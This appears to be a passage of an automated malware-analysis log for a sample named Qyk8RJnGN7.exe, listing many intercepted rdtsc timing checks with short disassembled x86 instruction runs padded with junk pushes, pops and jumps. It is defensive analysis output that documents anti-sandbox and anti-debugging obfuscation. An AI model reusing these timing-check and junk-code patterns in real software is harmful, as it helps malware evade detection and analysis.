    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79192 second address: F791AB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA1A3h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F791AB second address: F791B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F791B1 second address: F791F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0BACBDA1A3h 0x00000010 jmp 00007F0BACBDA1A3h 0x00000015 jmp 00007F0BACBDA19Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799DF second address: F799E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799E3 second address: F799FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F799FD second address: F79A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79A03 second address: F79A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7B4B5 second address: F7B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DE64 second address: F7DE83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DE83 second address: F7DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF45 second address: F7DF58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnp 00007F0BACBDA196h 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF58 second address: F7DF5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF5E second address: F7DF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7DF62 second address: F7DF66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1CE second address: F7E1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1D2 second address: F7E1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F0BACBDA3E4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7E1E4 second address: F7E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80F8F second address: F80FAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F0BACBDA3E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80FAC second address: F80FD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA19Bh 0x00000008 jmp 00007F0BACBDA19Bh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F0BACBDA1A6h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F80FD5 second address: F80FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E61 second address: F82E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BACBDA196h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E6C second address: F82E76 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA3DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E76 second address: F82E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jnc 00007F0BACBDA196h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BACBDA19Bh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E93 second address: F82E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0BACBDA3D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F82E9F second address: F82EAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470758 second address: 547075E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547075E second address: 5470764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470764 second address: 5470768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470768 second address: 54707A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0BACBDA19Dh 0x00000015 and eax, 371AF4A6h 0x0000001b jmp 00007F0BACBDA1A1h 0x00000020 popfd 0x00000021 push esi 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707A9 second address: 54707D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3E3h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707D2 second address: 54707D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707D6 second address: 54707DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54707DC second address: 5470816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 5Dh 0x0000000d mov cl, bh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F0BACBDA1A2h 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470816 second address: 547081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547081C second address: 547086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0BACBDA19Bh 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 mov al, 4Ch 0x00000013 push edi 0x00000014 pushfd 0x00000015 jmp 00007F0BACBDA19Ch 0x0000001a or eax, 568E3EF8h 0x00000020 jmp 00007F0BACBDA19Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547086D second address: 5470871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470871 second address: 5470882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470882 second address: 54708BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d call 00007F0BACBDA3DCh 0x00000012 jmp 00007F0BACBDA3E2h 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ecx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54708BE second address: 5470963 instructions: 0x00000000 rdtsc 0x00000002 mov ah, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebp-04h] 0x0000000a jmp 00007F0BACBDA1A4h 0x0000000f nop 0x00000010 jmp 00007F0BACBDA1A0h 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007F0BACBDA1A1h 0x0000001c push eax 0x0000001d mov bx, 1EF2h 0x00000021 pop edi 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 call 00007F0BACBDA1A4h 0x0000002a mov dx, si 0x0000002d pop ecx 0x0000002e call 00007F0BACBDA1A7h 0x00000033 mov di, cx 0x00000036 pop ecx 0x00000037 popad 0x00000038 push dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F0BACBDA19Ch 0x00000044 adc ch, FFFFFF98h 0x00000047 jmp 00007F0BACBDA19Bh 0x0000004c popfd 0x0000004d mov di, si 0x00000050 popad 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470963 second address: 5470969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 547097D second address: 5470983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A73 second address: 5470A8D instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3DCh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A8D second address: 5470A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A91 second address: 5470A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470A97 second address: 5470AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470AB0 second address: 5470ACD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470ACD second address: 5470ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470ADD second address: 5470AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0BACBDA3DAh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5470AF2 second address: 5460011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BACBDA19Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f cmp eax, 00000000h 0x00000012 setne al 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F0BACBDA197h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F0BB136C087h 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F0BACBDA19Dh 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460011 second address: 5460070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0BACBDA3DCh 0x00000011 and si, 3CA8h 0x00000016 jmp 00007F0BACBDA3DBh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007F0BACBDA3E6h 0x00000024 adc ax, 2F08h 0x00000029 jmp 00007F0BACBDA3DBh 0x0000002e popfd 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460070 second address: 54600CD instructions: 0x00000000 rdtsc 0x00000002 mov esi, 555FC17Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c call 00007F0BACBDA19Bh 0x00000011 pushfd 0x00000012 jmp 00007F0BACBDA1A8h 0x00000017 adc cx, 6498h 0x0000001c jmp 00007F0BACBDA19Bh 0x00000021 popfd 0x00000022 pop esi 0x00000023 call 00007F0BACBDA1A9h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600CD second address: 54600DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a movzx eax, dx 0x0000000d mov bx, CCE6h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600DF second address: 54600E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54600E4 second address: 5460152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 8Fh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F0BACBDA3DBh 0x00000010 sub esp, 2Ch 0x00000013 pushad 0x00000014 mov di, cx 0x00000017 mov ch, 20h 0x00000019 popad 0x0000001a push esi 0x0000001b jmp 00007F0BACBDA3E8h 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007F0BACBDA3E0h 0x00000028 xchg eax, edi 0x00000029 jmp 00007F0BACBDA3E0h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0BACBDA3DEh 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601B8 second address: 54601EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, 00000000h 0x0000000f jmp 00007F0BACBDA19Ah 0x00000014 inc ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0BACBDA1A7h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54601EB second address: 5460237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F0BACBDA3DEh 0x00000010 je 00007F0BACBDA5E3h 0x00000016 jmp 00007F0BACBDA3E0h 0x0000001b lea ecx, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460237 second address: 546023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546023B second address: 5460241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460241 second address: 5460250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460250 second address: 5460277 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-14h], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460277 second address: 546027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, F2h 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546027E second address: 5460290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3DEh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602BA second address: 54602C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602C0 second address: 54602D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA3E3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602D7 second address: 54602E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602E5 second address: 54602ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602ED second address: 54602F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54602F3 second address: 54602F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460386 second address: 54603E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA1A1h 0x00000009 or ax, 2F06h 0x0000000e jmp 00007F0BACBDA1A1h 0x00000013 popfd 0x00000014 mov eax, 6810F2B7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jg 00007F0C1DE68268h 0x00000022 jmp 00007F0BACBDA19Ah 0x00000027 js 00007F0BACBDA1F1h 0x0000002d jmp 00007F0BACBDA1A0h 0x00000032 cmp dword ptr [ebp-14h], edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54603E9 second address: 5460406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460406 second address: 546043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov si, F56Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F0C1DE6821Eh 0x00000013 jmp 00007F0BACBDA1A2h 0x00000018 mov ebx, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0BACBDA19Ah 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546043C second address: 5460440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460440 second address: 5460446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 5460446 second address: 54604F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0BACBDA3DCh 0x00000009 and esi, 271347F8h 0x0000000f jmp 00007F0BACBDA3DBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0BACBDA3E1h 0x00000025 and ecx, 24A51C96h 0x0000002b jmp 00007F0BACBDA3E1h 0x00000030 popfd 0x00000031 mov dh, ch 0x00000033 popad 0x00000034 push ebx 0x00000035 jmp 00007F0BACBDA3E8h 0x0000003a mov dword ptr [esp], esi 0x0000003d pushad 0x0000003e mov cx, B53Dh 0x00000042 pushfd 0x00000043 jmp 00007F0BACBDA3DAh 0x00000048 or ah, 00000018h 0x0000004b jmp 00007F0BACBDA3DBh 0x00000050 popfd 0x00000051 popad 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0BACBDA3E0h 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604F0 second address: 54604F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604F4 second address: 54604FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 54604FA second address: 546050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA19Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: 546050B second address: 5460530 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0BACBDA3DCh 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 23DD096Dh 0x00000015 mov ah, CFh 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
